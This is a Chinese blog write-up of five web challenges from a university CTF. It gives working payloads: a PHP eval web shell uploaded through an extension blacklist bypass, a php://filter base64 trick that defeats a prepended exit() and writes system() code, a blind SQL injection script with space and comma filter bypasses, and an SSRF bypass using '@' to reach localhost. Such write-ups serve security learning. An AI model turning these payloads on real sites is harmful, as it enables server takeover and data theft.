CDUT第一届CTF赛web wp

web的知识点比较单一,没有什么弯弯绕绕,一共五道题。
签到题:提示flag在源码中,审查元素,得到You are looking for this password: html_sourcecode,然后直接将html_sourcecode加上flag{}(一开始都没想到这里来。。。),提交。

easybypass:简单的文件上传漏洞。打开是文件上传,随便上传一个php文件,返回不能php后缀,看样子是黑名单,直接用pht绕过,一共有这些php2, php3, php4, php5, phps, pht, phtm, phtml。php文件内容<?php phpinfo();?>,上传,还返回了文件路径,访问,直接显示出php配置信息。接下来上传一句话<?php @eval($_POST['pass']);?>,菜刀连接,得到flag。

exit:打开页面直接显示源代码。大致意思是接收2个参数,在c参数前加上<?php exit;?>,然后将其写入我们filename文件里(这里一看就是tmp.php)。

 <?php
show_source(__FILE__);
$c = "<?php exit;?>";
@$c.=$_GET['c'];
@$filename = $_GET['file'];
@file_put_contents($filename, $c);
highlight_file('tmp.php');
?> 

所以问题就在于开头增加了exit过程,导致即使我们写入的命令无法执行。所以接下来可以使用base64编码绕过。
具体:我们可以将传递c参数进行base64编码,写入文件的内容就成了<?php exit;?>加上base64后的字符串,再写入时利用 php://filter协议进行解码,<?php exit;?>里面的字符<、?、;、>、空格不符合base64编码的字符范围将被忽略。所以最终被解码的字符仅有“phpexit”和我们传入的字符串。还有一点,因为base64算法解码时是4个byte一组,phpexit一共只有7个字符,所以给他增加1个字符‘a’,共8个字符。不然会吃掉我们一个字符。payload如下。

#传入的内容
<?php system('ls') ;?>
#编码后
PD9waHAgc3lzdGVtKCdscycpIDs/Pg==
#payload
?c=aPD9waHAgc3lzdGVtKCdscycpIDs/Pg==&file=php://filter/write=convert.base64-decode/resource=tmp.php

然后访问tmp.php文件,得到phpinfo123.php,访问它,搜索一下就能得到flag。

图片.png

放篇大佬博客https://www.leavesongs.com/PENETRATION/php-filter-magic.html

sqli:一道sql注入,打开显示登录框,随便输入个admin/admin,进入到登录成功界面,不过里面什么都没有。返回到登录页面,先输个测试语句,admin' and 1=1#。可以看到返回,过滤了空格,后面测试还过滤了逗号。
用()可以绕过空格,用from 1 for 1绕过逗号。这里我们使用布尔盲注。简单测下数据库的长度,

图片.png

然后上脚本,这里爆出字段后base64解码一下即可。

# !/usr/bin/env python
# -*- coding: utf-8 -*-
import requests

chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{},!@#$%^&*()_+-="
url = "http://172.19.184.202:29821/login.php"
//注意登录成功会返回的页面是I am admin! However, I cannot do anything. lol,随便选个
yes = "lol"
name = ""

for i in range(1, 100):
    print(i)
    for char in chars:
        #爆库名:xman
        #payload = "admin'and(ascii(substr(database()from(" + str(i) + ")for(1)))=" + str(ord(char)) + ")#"
        #爆表名:ctf_flags,ctf_users
        # payload = "admin'and(ascii(substr((select(group_concat(table_name))from(information_schema.tables)" \
        #           "where(table_schema=database()))from(" + str(i) + ")for(1)))=" + str(ord(char)) + ")#"
        #爆列名:id,ggflag    user表:id,rname,gpass,pinfo
        # payload = "admin'and(ascii(substr((select(group_concat(column_name))from(information_schema.columns)" \
        #           "where(table_name='ctf_users'))from(" + str(i) + ")for(1)))=" + str(ord(char)) + ")#"
        #爆字段:
        payload = "admin'and(ascii(substr((select(group_concat(gpass))from(ctf_users))from(" + str(i) + ")for(1)))=" + str(ord(char)) + ")#"
        data = {
            "username": payload,
            "password": "1",
            "submit": "1"
        }
        res = requests.post(url, data=data).content.decode("utf-8")
        if yes in res:
            name += char
            print(name)
            break

ssrf1:ssrf简单解释下吧,是构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
相当于,我们能访问一个web服务器,然后web服务器向内网服务器请求资源。我们就可以恶意构造这个请求。造成本地文件泄露,对内网进行扫描,得到有漏洞的信息。

访问页面。

图片.png

就是想让我们读取到flag.php。
直接输入,flag.php,提示必须以本站域名开头,输入http://172.19.184.202:26778/flag.php,将base64解码,得到need local。说明它需要解析到本地才能访问。
使用@绕过,提交http://172.19.184.202:26778@127.0.0.1/flag.php,得到base64,解码得到flag。
图片.png

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,718评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,683评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,207评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,755评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,862评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,050评论 1 291
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,136评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,882评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,330评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,651评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,789评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,477评论 4 333
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,135评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,864评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,099评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,598评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,697评论 2 351

推荐阅读更多精彩内容

  • WEB2 看源代码得flag 文件上传测试 找一张图片上传,截包改后缀名为.php得flag 计算题 F12修改输...
    a2dd56f6ad89阅读 18,499评论 0 2
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,821评论 0 9
  • 记MOCTF做题 签到 大概是加入Q群,然后拿到flag吧 一道水题 查看源代码,在最下方看到flag 还是水题 ...
    Aluvion阅读 3,239评论 0 1
  • 要考试了 该好好复习
    七月安八月散阅读 152评论 0 0
  • 今天是和宝贝过的第一个传统情人节。2.14那天。很幸运的和宝宝一起过的。逛街、吃东西、散步……很开心。也是假期结束...
    你的小黑脸阅读 317评论 1 0